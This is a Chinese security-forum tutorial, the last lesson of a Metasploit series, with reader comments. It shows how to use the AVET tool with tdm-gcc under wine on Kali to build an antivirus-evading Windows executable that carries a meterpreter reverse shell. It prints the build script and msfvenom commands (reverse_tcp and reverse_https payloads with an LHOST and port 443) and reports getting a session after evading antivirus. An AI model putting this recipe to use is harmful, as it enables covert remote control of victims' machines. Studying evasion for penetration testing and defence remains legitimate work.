用户
搜索

该用户从未签到

安全团队

Rank: 7Rank: 7Rank: 7

36

主题

176

帖子

273

魔法币
收听
3
粉丝
21
注册时间
2016-8-17

i春秋认证春秋文阁

发表于 2017-8-8 23:25:46 67394
本帖最后由 Demon123 于 2017-8-8 23:37 编辑

1498995788979.png

这封帖子很久没发了,只想和各位说声抱歉!!!!!我回来了!!!!!!!!!


0x00
由于传播,利用此脚本所提供的工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,即刻安全以及工具作者不为此承担任何责任。


Metasploit系列课程第八课 最后的最后一课。这次和以往不同,最后一课不打算用视频,想用文章的形式给各位体现,说实在的个人的时间实在不太充裕,也是最近抽空给各位写下这篇文章。。。



Metasploit 系列教程 => 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg



0x01

Metasploit系列课程第八课这次使用到的工具呢是(AVET)


1.下载地址 : https://github.com/govolution/avet (其中的几篇pdf 文章不错)
1498995978528.png

2.在kali中使用这款工具呢。作者提示我们需要安装一样编译器是(tdm-gcc)(作者提供我的,不知道为什么装不上,所以我从官网上下载了,各位也可以使用我提供的)
http://tdm-gcc.tdragon.net/download 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
1498996174820.png

3.我们下载完后,将开始使用wine 在kali上安装tdm-gcc(在kali中会有中文乱码,可以跟着我图中步骤走,左图为我mac ,右图为kali 使用wine的情况,因时间关系我未去解决编码的问题,先凑合着看)
1498997269209.png

1498996586904.png

1498996688455.png

1498996753536.png

1498996825354.png

1498996998833.png


正在安装
1498997015884.png
安装完毕
1498997137286.png

1498997099344.png


0x02
  • 我们看下大致的目录情况


1498997475884.png

1498997487062.png

2.使用方法根据作者提示给我们的是这样的
1498997239538.png

[Shell] 纯文本查看 复制代码
root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_20xshikata.sh

那么我们可以看到他这边调用的是build的目录下的 build_win32_meterpreter_rev_https_20xshikata.sh,使用shell脚本
我们大致的看下这个脚本的代码:
[Shell] 纯文本查看 复制代码
#build_win64_meterpreter_rev_tcp_xor
环境变量定义
. avet/build/global_win64.sh
# make meterpreter reverse payload
#制作msf reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxxxx  lport=xxx -e x64/xor -f c --platform Windows > avet/sc.txt
#make_avet 格式化 这个 shellcode
./avet/format.sh avet/sc.txt > avet/scclean.txt && rm avet/sc.txt
#调用 make_avet, compile
./avet/make_avet -f avet/scclean.txt -X -E
$win64_compiler -o output/pwn.exe avet.c
输出pwn.exe 
# cleanup
rm avet/scclean.txt && echo "" > avet/defs.h
</pre>
1498998133097.png


  • 使用制作payload执行的过程
1498998245364.png

1498998316743.png

4.其中只要我们修改的代码呢其实就是msfvenom那段代码 将LHOST 和LPORT 改成自己想要的就可以了
[Shell] 纯文本查看 复制代码
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86

那么我们重新生成一次,并手动的开启MSF 。
1499000792945.png
在运行之前我们可以对pwn.exe检测一次是否能绕过AV

1498999379841.png

1499000080489.png
运行 制作成的pwn.exe后 得到meterpreter.

1499001129527.png

1499001086561.png

那么shell脚本下 可以这么写

1499002903000.png


补充 成果:
E724D4EE-4C37-4A00-A18A-4CBFF05368B9.png


最后的最后补充一句:虽然这个说的晚了,但还是想说:向伟大的革命先辈致敬!向老兵致敬!向守护着祖国领土的当代军人致敬!中国人民解放军90岁生日快乐!


                                                     扫一扫订阅二维码
                           qrcode.jpg










发表于 2017-8-9 09:13:28
使用道具 举报 回复
发表于 2017-8-10 11:24:22
https://github.com/demonsec666/secist_script  欢迎关注本人项目
使用道具 举报 回复
发表于 2017-8-11 10:57:34
这个厉害,新编译器会使很久多杀毒软件失效
使用道具 举报 回复
发表于 2017-8-11 12:41:15
ech0k 发表于 2017-8-11 10:57
这个厉害,新编译器会使很久多杀毒软件失效

感谢支持
使用道具 举报 回复
发表于 2017-8-12 15:12:21
前面的几篇呢???还有windows下pentestbox中的metasploit怎么升级???
使用道具 举报 回复
发表于 2017-8-12 17:10:53
D14tr0y 发表于 2017-8-12 15:12
前面的几篇呢???还有windows下pentestbox中的metasploit怎么升级???

github项目中 有百度云   至于你说的pentestbox 本人几乎不用
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册